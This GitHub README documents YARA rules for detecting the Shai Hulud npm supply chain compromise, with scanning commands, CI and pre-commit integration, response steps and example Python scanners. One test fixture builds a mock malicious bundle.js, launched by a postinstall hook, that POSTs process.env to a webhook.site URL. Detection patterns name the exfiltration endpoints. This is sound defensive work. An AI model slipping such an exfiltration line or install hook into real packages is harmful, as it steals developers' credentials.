sorenjohanson/shai-hulud-indicators

Shai Hulud Detection Rules

A comprehensive YARA ruleset for detecting compromise indicators from the Shai Hulud npm supply chain attack.

Overview

This project provides YARA detection rules to identify systems and codebases compromised by the Shai Hulud attack, a large-scale npm supply chain compromise that is ongoing (as of 2025-09-23) and has so far affected over 500 packages. The attack injects malicious postinstall scripts that execute obfuscated code to steal npm tokens, AWS credentials, and other sensitive information.

Attack background

The Shai Hulud attack has so far compromised packages across multiple organisations including:

  • CrowdStrike packages
  • NativeScript community packages
  • Various Angular and React ecosystem packages
  • Development tools and utilities

The malicious packages contain:

  • Obfuscated bundle.js files executed via postinstall hooks
  • Code that exfiltrates npm tokens and credentials to webhook.site endpoints
  • Self-replicating behaviour by cloning private repositories and inserting GitHub Actions workflows

Detection rules

The ruleset includes seven complementary detection rules:

1. Shai_Hulud_Compromised_Packages

  • Severity: Critical
  • Purpose: Detects known compromised packages by name and version
  • Use case: Scanning package.json files, dependency lists, and build logs

2. Shai_Hulud_Bundle_Hash

  • Severity: Critical
  • Purpose: Matches known SHA-256 hashes of malicious bundle.js files
  • Use case: File integrity checking and forensic analysis

3. Shai_Hulud_PostInstall_Hook

  • Severity: Medium
  • Purpose: Detects the malicious postinstall script pattern (a lifecycle hook that launches the bundled payload)
  • Use case: Scanning package.json for suspicious install hooks

4. Shai_Hulud_Exfiltration_Endpoint

  • Severity: Critical
  • Purpose: Identifies known C2/exfiltration endpoints
  • Use case: Network monitoring and log analysis

5. Shai_Hulud_Malicious_Package_Behavior

  • Severity: Medium
  • Purpose: Detects behavioural patterns of the malicious code
  • Use case: Runtime analysis and general suspicious activity detection

6. Shai_Hulud_Bundle_File

  • Severity: High
  • Purpose: Detects suspicious bundle.js files in npm packages
  • Use case: Scanning package.json and node_modules

7. Shai_Hulud_Suspicious_Behaviors

  • Severity: Medium
  • Purpose: Detects suspicious behaviours associated with Shai Hulud attack
  • Use case: Runtime analysis and general suspicious activity detection
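To make the indicators listed under "Attack background" and the checks behind rules 2, 3, 4 and 6 concrete, here is the same detection logic written as plain Python over a constructed node_modules tree. This is an added example, not the project's YARA rules: the package names, the bundle.js contents, the webhook.site UUID and the "known-bad" hash (which is simply the hash of the constructed bundle) are all made up, and the regular expression for the postinstall command is an assumption about how such a hook is written.

```python
"""Indicator checks in the spirit of the README's rules 2, 3, 4 and 6, as plain
Python (illustrative, not the project's YARA rules). The sample packages built
by demo() are constructed, and the 'known-bad' hash is the hash of that
constructed sample, not a real Shai Hulud indicator."""
import hashlib
import json
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Set

# Lifecycle hooks that npm runs automatically on install.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")
# The README describes an obfuscated bundle.js launched from a postinstall hook;
# this pattern is an assumption about how that hook is written.
BUNDLE_HOOK_RE = re.compile(r"\bnode\s+(?:\./)?bundle\.js\b")
# Exfiltration endpoint family named in the README (the token path is illustrative).
EXFIL_RE = re.compile(rb"webhook\.site/[0-9a-f-]{8,}", re.IGNORECASE)

Finding = Dict[str, str]


def scan_package(pkg_dir: Path, known_bad_hashes: Set[str]) -> List[Finding]:
    """Return findings for one installed package directory (package.json + bundle.js)."""
    findings: List[Finding] = []
    manifest = pkg_dir / "package.json"
    try:
        data = json.loads(manifest.read_text(encoding="utf-8"))
    except (OSError, ValueError):
        return [{"rule": "Unreadable_Manifest", "severity": "low",
                 "path": str(manifest), "detail": "could not parse package.json"}]
    name = data.get("name") or pkg_dir.name
    scripts = data.get("scripts") or {}
    for hook in LIFECYCLE_HOOKS:
        cmd = str(scripts.get(hook, ""))
        if BUNDLE_HOOK_RE.search(cmd):
            findings.append({"rule": "PostInstall_Hook", "severity": "medium",
                             "path": str(manifest), "detail": f"{name}: {hook} -> {cmd}"})
    bundle = pkg_dir / "bundle.js"
    if bundle.is_file():
        blob = bundle.read_bytes()
        digest = hashlib.sha256(blob).hexdigest()
        if digest in known_bad_hashes:
            findings.append({"rule": "Bundle_Hash", "severity": "critical",
                             "path": str(bundle), "detail": digest})
        hit = EXFIL_RE.search(blob)
        if hit:
            findings.append({"rule": "Exfiltration_Endpoint", "severity": "critical",
                             "path": str(bundle), "detail": hit.group(0).decode("ascii")})
    return findings


def scan_node_modules(root: Path, known_bad_hashes: Set[str]) -> List[Finding]:
    """Walk every package.json under root (nested node_modules included)."""
    findings: List[Finding] = []
    for manifest in sorted(root.rglob("package.json")):
        findings.extend(scan_package(manifest.parent, known_bad_hashes))
    return findings


def demo() -> List[Finding]:
    """Build a constructed node_modules tree in a temp dir, scan it, return findings."""
    with tempfile.TemporaryDirectory() as tmp:
        nm = Path(tmp) / "node_modules"
        # Constructed malicious-looking package: postinstall launches bundle.js,
        # and the bundle posts to a webhook.site URL (the UUID is made up).
        bad = nm / "@example" / "widget"
        bad.mkdir(parents=True)
        (bad / "package.json").write_text(json.dumps({
            "name": "@example/widget", "version": "1.2.3",
            "scripts": {"postinstall": "node bundle.js"}}), encoding="utf-8")
        bad_bundle = (b"var _0xab=['bnBtcmM='];"
                      b"fetch('https://webhook.site/0123abcd-ffff-4444-8888-0000deadbeef',"
                      b"{method:'POST',body:JSON.stringify(process.env)});")
        (bad / "bundle.js").write_bytes(bad_bundle)
        # Constructed benign package whose postinstall builds a native addon: must not fire.
        good = nm / "native-thing"
        good.mkdir()
        (good / "package.json").write_text(json.dumps({
            "name": "native-thing", "version": "0.1.0",
            "scripts": {"postinstall": "node scripts/build-native.js"}}), encoding="utf-8")
        known_bad = {hashlib.sha256(bad_bundle).hexdigest()}  # constructed, not a real IOC
        return scan_node_modules(nm, known_bad)
```

The benign package with an ordinary postinstall is there on purpose: a hook alone is only a medium-severity signal, which is why the hash and endpoint checks carry the critical verdict.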

Usage

Prerequisites

Install YARA on your system:

# Ubuntu/Debian
sudo apt-get install yara

# Fedora
sudo dnf install yara

# macOS
brew install yara

# CentOS/RHEL
sudo yum install yara

Basic scanning

Scan a single file:

yara shai-hulud-rules.yar /path/to/suspicious/file

Scan a directory recursively:

yara -r shai-hulud-rules.yar /path/to/project/

Scan and print the matched strings with their offsets (useful for triage; -s is not a general verbose flag):

yara -s shai-hulud-rules.yar /path/to/scan/

Common use cases

Scan package.json files

find . -name "package.json" -exec yara shai-hulud-rules.yar {} \;

Scan node_modules for compromised packages

yara -r shai-hulud-rules.yar ./node_modules/

Scan JavaScript bundles

find . -name "*.js" -exec yara shai-hulud-rules.yar {} \;

Integration examples

CI/CD pipeline integration

# .github/workflows/security-scan.yml
- name: Scan for Shai Hulud compromise
  run: |
    # Install YARA
    sudo apt-get update
    sudo apt-get install -y yara

    # Keep the rules outside the scanned tree: the rules file carries the
    # indicator strings in plaintext and would otherwise match itself
    wget -O /tmp/shai-hulud-rules.yar https://raw.githubusercontent.com/sorenjohanson/shai-hulud-indicators/refs/heads/main/shai-hulud-rules.yar

    # yara exits 0 whenever it ran without error, matches or not,
    # so test for output rather than for the exit status
    matches=$(yara -r /tmp/shai-hulud-rules.yar .)
    if [ -n "$matches" ]; then
      echo "Shai Hulud compromise indicators detected!"
      echo "$matches"
      exit 1
    fi

Pre-commit hook

#!/bin/bash
# .git/hooks/pre-commit
# Scan only the files staged for this commit (-z is safe for odd file names).
# yara exits 0 whether or not anything matched, so test for output instead.
hit=0
while IFS= read -r -d '' f; do
    [ -f "$f" ] || continue
    out=$(yara shai-hulud-rules.yar "$f")
    if [ -n "$out" ]; then echo "$out"; hit=1; fi
done < <(git diff --cached --name-only --diff-filter=ACM -z)
if [ "$hit" -eq 1 ]; then
    echo "ERROR: Shai Hulud compromise indicators detected. Commit blocked."
    exit 1
fi
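Both the CI step and the pre-commit hook above hinge on one detail: yara's exit status says whether the scan ran, not whether anything matched, so a wrapper has to read the report yara prints (one `rule_name path` line per match and, with `-s`, one `0xOFFSET:$identifier: data` line per matched string). The following added example, not part of the ruleset, parses that report, maps rule names to the severities listed in this README, ignores matches against the rules file itself, and turns the result into an exit code. The sample output is constructed, and the `$postinstall`, `$webhook` and `$npmrc` string identifiers in it are made up rather than taken from the real rules.

```python
"""Gate a CI job or git hook on yara's output rather than its exit status.
Example code added here, not part of the ruleset; SAMPLE_OUTPUT is a
constructed `yara -s` report and its $identifier names are made up."""
import re
from dataclasses import dataclass, field
from typing import Iterable, List, Tuple

# Severities as listed in the README for each rule.
SEVERITY = {
    "Shai_Hulud_Compromised_Packages": "critical",
    "Shai_Hulud_Bundle_Hash": "critical",
    "Shai_Hulud_PostInstall_Hook": "medium",
    "Shai_Hulud_Exfiltration_Endpoint": "critical",
    "Shai_Hulud_Malicious_Package_Behavior": "medium",
    "Shai_Hulud_Bundle_File": "high",
    "Shai_Hulud_Suspicious_Behaviors": "medium",
}

# 'rule_name path' lines; YARA identifiers are [A-Za-z_][A-Za-z0-9_]*
MATCH_RE = re.compile(r"^([A-Za-z_][A-Za-z0-9_]*) (.+)$")
# '0xOFFSET:$identifier: data' lines printed by -s
STRING_RE = re.compile(r"^0x[0-9A-Fa-f]+:(\$[A-Za-z0-9_]+):\s?(.*)$")


@dataclass
class Match:
    rule: str
    path: str
    strings: List[Tuple[str, str]] = field(default_factory=list)

    @property
    def severity(self) -> str:
        return SEVERITY.get(self.rule, "unknown")


def parse_yara_output(text: str) -> List[Match]:
    matches: List[Match] = []
    for line in text.splitlines():
        s = STRING_RE.match(line)
        if s and matches:            # string detail belongs to the preceding match line
            matches[-1].strings.append((s.group(1), s.group(2)))
            continue
        m = MATCH_RE.match(line)
        if m:
            matches.append(Match(rule=m.group(1), path=m.group(2)))
    return matches


def gate(text: str, fail_on: Iterable[str] = ("critical", "high"),
         rules_file: str = "shai-hulud-rules.yar") -> Tuple[int, List[Match]]:
    """Return (exit_code, matches). Matches against the rules file itself are
    dropped: it carries the indicator strings in plaintext and will match
    whenever it sits inside the scanned tree."""
    fail = set(fail_on)
    matches = [m for m in parse_yara_output(text)
               if m.path != rules_file
               and not m.path.replace("\\", "/").endswith("/" + rules_file)]
    blocking = False
    for m in matches:
        block = m.severity in fail
        blocking = blocking or block
        print(f"{'BLOCK' if block else 'WARN '} {m.severity:<8} {m.rule} {m.path}")
        for ident, data in m.strings:
            print(f"      {ident} = {data}")
    return (1 if blocking else 0), matches


# Constructed sample of `yara -s` output for a tree that also contains the rules file.
SAMPLE_OUTPUT = """\
Shai_Hulud_PostInstall_Hook ./node_modules/@example/widget/package.json
0x41:$postinstall: "postinstall": "node bundle.js"
Shai_Hulud_Exfiltration_Endpoint ./node_modules/@example/widget/bundle.js
0x2f0:$webhook: webhook.site
Shai_Hulud_Exfiltration_Endpoint ./shai-hulud-rules.yar
0x1a3:$webhook: webhook.site
Shai_Hulud_Suspicious_Behaviors ./scripts/publish.js
0x10:$npmrc: .npmrc
"""

if __name__ == "__main__":
    exit_code, _ = gate(SAMPLE_OUTPUT)
    raise SystemExit(exit_code)
```

Medium-severity rules are printed but do not block by default, since the README notes that ordinary postinstall scripts and legitimate .npmrc access can trigger them; pass `fail_on=("critical", "high", "medium")` to a stricter pipeline.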

Response actions

If any rules trigger, immediately:

  1. Isolate affected systems from network access
  2. Audit all npm tokens, GitHub tokens and API keys, and rotate them immediately
  3. Check AWS/cloud credentials for unauthorised usage
  4. Review lockfiles for compromised package versions
  5. Scan CI/CD systems and build artifacts, including repositories for GitHub Actions workflows you did not add
  6. Update or downgrade all dependencies to clean versions
  7. Monitor network logs for exfiltration attempts

Rule maintenance

This ruleset is designed for detection of known versions of Shai Hulud (latest known version is version 7). For ongoing supply chain security:

  • Regularly update dependency scanning tools
  • Implement software bill of materials (SBOM) tracking
  • Monitor your package managers' audit reports
  • Use dependency pinning and integrity checking

Prevent lifecycle script execution

Package managers may automatically execute lifecycle scripts like pre- or postinstall scripts. To prevent malicious script execution:

  • npm: Use npm ci --ignore-scripts (combines an exact install from the lockfile with script prevention)
  • yarn v1: Use yarn install --frozen-lockfile --ignore-scripts
  • yarn v2+: Use yarn install --immutable --ignore-scripts
  • pnpm (10+) and bun: Do not run dependency lifecycle scripts by default, but still pass --frozen-lockfile locally

Always use frozen lockfile options both in CI and locally to prevent dependency updates that could introduce compromised versions. Note that --ignore-scripts also skips your own project's lifecycle scripts (prepare, postinstall), so run any build step you rely on explicitly.
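Two of the checks above can be run straight from the lockfile without installing anything: step 4 of the response actions (compare every resolved name@version against the compromised list) and, for the lifecycle-script point just made, listing which packages npm recorded as carrying install scripts via the hasInstallScript flag in lockfileVersion 2/3. The following is an added example, not part of the ruleset: the lockfiles are constructed, and the compromised list is a placeholder, not the indicator set in the project's Shai_Hulud_Compromised_Packages rule.

```python
"""Lockfile audit: flag (name, version) pairs on a compromised list and list
every package the lockfile marks as having install scripts. Example code added
here, not part of the ruleset. The lockfiles and the compromised list below are
constructed placeholders."""
import json
from typing import Dict, Iterator, List, Set, Tuple

Compromised = Dict[str, Set[str]]          # package name -> affected versions


def iter_lock_packages(lock: dict) -> Iterator[Tuple[str, str, dict]]:
    """Yield (name, version, entry) for each installed package in a package-lock.json.
    lockfileVersion 2/3 keep a flat 'packages' map keyed by install path;
    lockfileVersion 1 nests 'dependencies' objects."""
    packages = lock.get("packages")
    if packages is not None:
        for path, entry in packages.items():
            if path == "":                       # the root project itself
                continue
            # 'node_modules/a/node_modules/@s/b' -> '@s/b'; aliases carry an explicit name
            name = entry.get("name") or path.rsplit("node_modules/", 1)[-1]
            yield name, entry.get("version", ""), entry
        return
    stack = [lock.get("dependencies", {})]
    while stack:
        for name, entry in stack.pop().items():
            yield name, entry.get("version", ""), entry
            if entry.get("dependencies"):
                stack.append(entry["dependencies"])


def audit_lockfile(lock: dict, compromised: Compromised) -> Dict[str, List[str]]:
    hits: List[str] = []
    install_scripts: List[str] = []
    for name, version, entry in iter_lock_packages(lock):
        if version in compromised.get(name, set()):
            hits.append(f"{name}@{version}")
        # npm sets hasInstallScript for packages with preinstall/install/postinstall hooks
        if entry.get("hasInstallScript"):
            install_scripts.append(f"{name}@{version}")
    return {"compromised": sorted(hits), "install_scripts": sorted(install_scripts)}


def audit_lockfile_text(text: str, compromised: Compromised) -> Dict[str, List[str]]:
    return audit_lockfile(json.loads(text), compromised)


# Constructed placeholder list, NOT the real indicator set.
SAMPLE_COMPROMISED: Compromised = {"@example/widget": {"1.2.3", "1.2.4"}}

# Constructed lockfileVersion 3 file: one hit, one nested clean copy, one benign native addon.
SAMPLE_LOCK_V3 = json.dumps({
    "name": "demo-app", "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "version": "1.0.0"},
        "node_modules/@example/widget": {"version": "1.2.3", "hasInstallScript": True},
        "node_modules/some-lib": {"version": "2.0.0"},
        "node_modules/some-lib/node_modules/@example/widget": {"version": "1.2.2"},
        "node_modules/native-thing": {"version": "0.1.0", "hasInstallScript": True},
    },
})

# Constructed lockfileVersion 1 file with the same hit nested one level down.
SAMPLE_LOCK_V1 = json.dumps({
    "name": "demo-app", "lockfileVersion": 1,
    "dependencies": {
        "some-lib": {"version": "2.0.0",
                     "dependencies": {"@example/widget": {"version": "1.2.4"}}},
    },
})

if __name__ == "__main__":
    print(audit_lockfile_text(SAMPLE_LOCK_V3, SAMPLE_COMPROMISED))
    print(audit_lockfile_text(SAMPLE_LOCK_V1, SAMPLE_COMPROMISED))
```

Run it against a real package-lock.json with the name@version list from the project's rule 1 substituted for SAMPLE_COMPROMISED; the nested copy at 1.2.2 is reported clean on purpose, since lockfiles routinely pin several versions of the same package.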

False positives

These rules are designed to minimise false positives by focusing on specific indicators of the Shai Hulud attack. However, legitimate packages may occasionally trigger alerts if they:

  • Have similar naming patterns to compromised packages
  • Use legitimate postinstall scripts with similar patterns
  • Access npm configuration files for valid reasons

Always investigate and validate alerts in context.
